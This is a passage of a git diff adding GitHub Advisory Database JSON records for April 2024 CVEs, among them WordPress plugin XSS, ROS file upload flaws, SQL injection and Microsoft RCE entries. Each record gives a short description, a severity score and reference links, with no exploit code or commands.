in ROS2 (Robot Operating System 2) Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via a crafted payload to the file upload mechanism of the ROS2 system, including the server’s functionality for handling file uploads and the associated validation processes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30703" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30703" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5qq4-q34c-9875/GHSA-5qq4-q34c-9875.json b/advisories/unreviewed/2024/04/GHSA-5qq4-q34c-9875/GHSA-5qq4-q34c-9875.json new file mode 100644 index 00000000000..84f1b4dc45e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5qq4-q34c-9875/GHSA-5qq4-q34c-9875.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qq4-q34c-9875", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2185" + ], + "details": "The Beaver Builder Addons by WPZOOM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Box widget in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2185" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3046905/wpzoom-addons-for-beaver-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/03564cae-df90-454b-8379-6ad9f22b7389?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5qvc-39c2-6m74/GHSA-5qvc-39c2-6m74.json b/advisories/unreviewed/2024/04/GHSA-5qvc-39c2-6m74/GHSA-5qvc-39c2-6m74.json new file mode 100644 index 00000000000..f4edda77edf --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5qvc-39c2-6m74/GHSA-5qvc-39c2-6m74.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qvc-39c2-6m74", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2507" + ], + "details": "The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget button URL in all versions up to, and including, 1.0.16 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2507" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/jetwidgets-for-elementor/tags/1.0.16&old=3055510&new_path=/jetwidgets-for-elementor/tags/1.0.17&new=3055510&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a02f0a23-0b2b-4e16-9f6d-ec6302a0d23b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5v2g-8pw8-cqg5/GHSA-5v2g-8pw8-cqg5.json b/advisories/unreviewed/2024/04/GHSA-5v2g-8pw8-cqg5/GHSA-5v2g-8pw8-cqg5.json new file mode 100644 index 00000000000..5a8c5c79fac --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5v2g-8pw8-cqg5/GHSA-5v2g-8pw8-cqg5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5v2g-8pw8-cqg5", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1641" + ], + "details": "The Accordion plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'accordions_duplicate_post_as_draft' function in all versions up to, and including, 2.2.96. This makes it possible for authenticated attackers, with contributor access and above, to duplicate arbitrary posts, allowing access to the contents of password-protected posts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1641" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/accordions/tags/2.2.96/includes/duplicate-post.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/accordions/tags/2.2.96&old=3050599&new_path=/accordions/tags/2.2.97&new=3050599&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e7e7c70-4d07-4550-9cf8-5135b87b67ca?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5vxj-pv2g-wxwf/GHSA-5vxj-pv2g-wxwf.json b/advisories/unreviewed/2024/04/GHSA-5vxj-pv2g-wxwf/GHSA-5vxj-pv2g-wxwf.json new file mode 100644 index 00000000000..02996e6b0f1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5vxj-pv2g-wxwf/GHSA-5vxj-pv2g-wxwf.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5vxj-pv2g-wxwf", + "modified": "2024-04-06T12:30:56Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-3369" + ], + "details": "A vulnerability, which was classified as critical, has been found in code-projects Car Rental 1.0. Affected by this issue is some unknown functionality of the file add-vehicle.php. The manipulation of the argument Upload Image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259490 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3369" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1wLMnGzcbyCoZ_Wp-bHpLD49MZ9-XHPUK/view?usp=drive_link" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259490" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259490" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311147" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T11:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5w6f-4hgh-2xpc/GHSA-5w6f-4hgh-2xpc.json b/advisories/unreviewed/2024/04/GHSA-5w6f-4hgh-2xpc/GHSA-5w6f-4hgh-2xpc.json new file mode 100644 index 00000000000..2ea6abd295a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5w6f-4hgh-2xpc/GHSA-5w6f-4hgh-2xpc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5w6f-4hgh-2xpc", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26245" + ], + "details": "Windows SMB Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26245" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26245" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5xph-5gr6-2w3x/GHSA-5xph-5gr6-2w3x.json b/advisories/unreviewed/2024/04/GHSA-5xph-5gr6-2w3x/GHSA-5xph-5gr6-2w3x.json new file mode 100644 index 00000000000..565aace8564 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5xph-5gr6-2w3x/GHSA-5xph-5gr6-2w3x.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xph-5gr6-2w3x", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1934" + ], + "details": "The WP Compress – Image Optimizer plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wps_local_compress::__construct' function in all versions up to, and including, 6.11.10. This makes it possible for unauthenticated attackers to reset the CDN region and set a malicious URL to deliver images.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1934" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-compress-image-optimizer/tags/6.10.35/addons/legacy/compress.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3054445@wp-compress-image-optimizer/trunk&old=3048575@wp-compress-image-optimizer/trunk&sfp_email=&sfph_mail=#file2" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/88a46a24-6d46-44cc-ac01-70a1c329cb51?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6234-wr38-h5fr/GHSA-6234-wr38-h5fr.json b/advisories/unreviewed/2024/04/GHSA-6234-wr38-h5fr/GHSA-6234-wr38-h5fr.json new file mode 100644 index 00000000000..db634544717 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6234-wr38-h5fr/GHSA-6234-wr38-h5fr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6234-wr38-h5fr", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28935" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28935" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28935" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-629p-r69g-qfrc/GHSA-629p-r69g-qfrc.json b/advisories/unreviewed/2024/04/GHSA-629p-r69g-qfrc/GHSA-629p-r69g-qfrc.json new file mode 100644 index 00000000000..af61293c94c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-629p-r69g-qfrc/GHSA-629p-r69g-qfrc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-629p-r69g-qfrc", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2957" + ], + "details": "The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name field in all versions up to, and including, 20240216 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attacker to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2957" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040452%40simple-ajax-chat&new=3040452%40simple-ajax-chat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f67b5cd8-bae8-48ca-87d5-7445724791f6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-62gj-gx39-jgj7/GHSA-62gj-gx39-jgj7.json b/advisories/unreviewed/2024/04/GHSA-62gj-gx39-jgj7/GHSA-62gj-gx39-jgj7.json new file mode 100644 index 00000000000..a19e8320fb9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-62gj-gx39-jgj7/GHSA-62gj-gx39-jgj7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62gj-gx39-jgj7", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30735" + ], + "details": "An arbitrary file upload vulnerability has been discovered in ROS Kinetic Kame in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via crafted payload to the file upload mechanism of the ROS system, including the server’s functionality for handling file uploads and the associated validation processes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30735" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30735" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-62qp-h6pg-8q3g/GHSA-62qp-h6pg-8q3g.json b/advisories/unreviewed/2024/04/GHSA-62qp-h6pg-8q3g/GHSA-62qp-h6pg-8q3g.json new file mode 100644 index 00000000000..8fa26614839 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-62qp-h6pg-8q3g/GHSA-62qp-h6pg-8q3g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62qp-h6pg-8q3g", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2138" + ], + "details": "The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Animated Box widget in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2138" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3050010/jetwidgets-for-elementor" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f807b605-68a8-4340-a275-776eac0936fa?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-64qx-rv33-fw3r/GHSA-64qx-rv33-fw3r.json b/advisories/unreviewed/2024/04/GHSA-64qx-rv33-fw3r/GHSA-64qx-rv33-fw3r.json new file mode 100644 index 00000000000..9c9b0fda7b1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-64qx-rv33-fw3r/GHSA-64qx-rv33-fw3r.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64qx-rv33-fw3r", + "modified": "2024-04-06T21:30:35Z", + "published": "2024-04-06T21:30:35Z", + "aliases": [ + "CVE-2024-28741" + ], + "details": "Cross Site Scripting vulnerability in EginDemirbilek NorthStar C2 v1 allows a remote attacker to execute arbitrary code via the login.php component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28741" + }, + { + "type": "WEB", + "url": "https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss" + }, + { + "type": "WEB", + "url": "https://github.com/EnginDemirbilek/NorthStarC2" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/177542/NorthStar-C2-Agent-1.0-Cross-Site-Scripting-Remote-Command-Execution.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6564-xvqw-fc42/GHSA-6564-xvqw-fc42.json b/advisories/unreviewed/2024/04/GHSA-6564-xvqw-fc42/GHSA-6564-xvqw-fc42.json new file mode 100644 index 00000000000..4c6bf7450e6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6564-xvqw-fc42/GHSA-6564-xvqw-fc42.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6564-xvqw-fc42", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26200" + ], + "details": "Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26200" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26200" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-658g-8whg-f6jx/GHSA-658g-8whg-f6jx.json b/advisories/unreviewed/2024/04/GHSA-658g-8whg-f6jx/GHSA-658g-8whg-f6jx.json new file mode 100644 index 00000000000..e2882699fda --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-658g-8whg-f6jx/GHSA-658g-8whg-f6jx.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-658g-8whg-f6jx", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2513" + ], + "details": "The WP Chat App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'imageAlt' block attribute in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2513" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/wp-whatsapp/tags/3.6.2&old=3061150&new_path=/wp-whatsapp/tags/3.6.3&new=3061150&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3bba2901-55a7-4ef1-ab3c-1415aa99c729?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-65q5-5rwq-hg89/GHSA-65q5-5rwq-hg89.json b/advisories/unreviewed/2024/04/GHSA-65q5-5rwq-hg89/GHSA-65q5-5rwq-hg89.json new file mode 100644 index 00000000000..1b85c0812ae --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-65q5-5rwq-hg89/GHSA-65q5-5rwq-hg89.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65q5-5rwq-hg89", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28927" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28927" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28927" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-665w-fpf3-c2hw/GHSA-665w-fpf3-c2hw.json b/advisories/unreviewed/2024/04/GHSA-665w-fpf3-c2hw/GHSA-665w-fpf3-c2hw.json new file mode 100644 index 00000000000..20a8f3ec334 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-665w-fpf3-c2hw/GHSA-665w-fpf3-c2hw.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-665w-fpf3-c2hw", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2302" + ], + "details": "The Easy Digital Downloads – Sell Digital Files & Subscriptions (eCommerce Store + Payments Made Easy) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.9. This makes it possible for unauthenticated attackers to download the debug log via Directory Listing. This file may include PII.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2302" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-digital-downloads/trunk/includes/class-edd-logging.php#L621" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3060808%40easy-digital-downloads%2Ftrunk&old=3042139%40easy-digital-downloads%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0837ba20-4b47-4cc8-9eb3-322289513d79?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-66j8-c83m-gj5f/GHSA-66j8-c83m-gj5f.json b/advisories/unreviewed/2024/04/GHSA-66j8-c83m-gj5f/GHSA-66j8-c83m-gj5f.json new file mode 100644 index 00000000000..952513aae6a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-66j8-c83m-gj5f/GHSA-66j8-c83m-gj5f.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-66j8-c83m-gj5f", + "modified": "2024-04-09T18:30:22Z", + "published": "2024-04-09T18:30:22Z", + "aliases": [ + "CVE-2024-31864" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin.\n\nThe attacker can inject sensitive configuration or malicious code when connecting MySQL database via JDBC driver.\nThis issue affects Apache Zeppelin: before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31864" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4709" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/752qdk0rnkd9nqtornz734zwb7xdwcdb" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2020-11974" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-674p-xmpw-wcmm/GHSA-674p-xmpw-wcmm.json b/advisories/unreviewed/2024/04/GHSA-674p-xmpw-wcmm/GHSA-674p-xmpw-wcmm.json new file mode 100644 index 00000000000..69d25865868 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-674p-xmpw-wcmm/GHSA-674p-xmpw-wcmm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-674p-xmpw-wcmm", + "modified": "2024-04-09T09:31:12Z", + "published": "2024-04-09T09:31:12Z", + "aliases": [ + "CVE-2024-31370" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CodeIsAwesome AIKit.This issue affects AIKit: from n/a through 4.14.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31370" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/aikit-wordpress-ai-writing-assistant-using-gpt3/wordpress-codeisawesome-aikit-plugin-4-14-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-67xf-fx93-jxw5/GHSA-67xf-fx93-jxw5.json b/advisories/unreviewed/2024/04/GHSA-67xf-fx93-jxw5/GHSA-67xf-fx93-jxw5.json new file mode 100644 index 00000000000..f7be7f84a1d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-67xf-fx93-jxw5/GHSA-67xf-fx93-jxw5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-67xf-fx93-jxw5", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26210" + ], + "details": "Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26210" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26210" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-68ww-8rpc-355h/GHSA-68ww-8rpc-355h.json b/advisories/unreviewed/2024/04/GHSA-68ww-8rpc-355h/GHSA-68ww-8rpc-355h.json new file mode 100644 index 00000000000..ee8913b830f --- /dev/null +++ 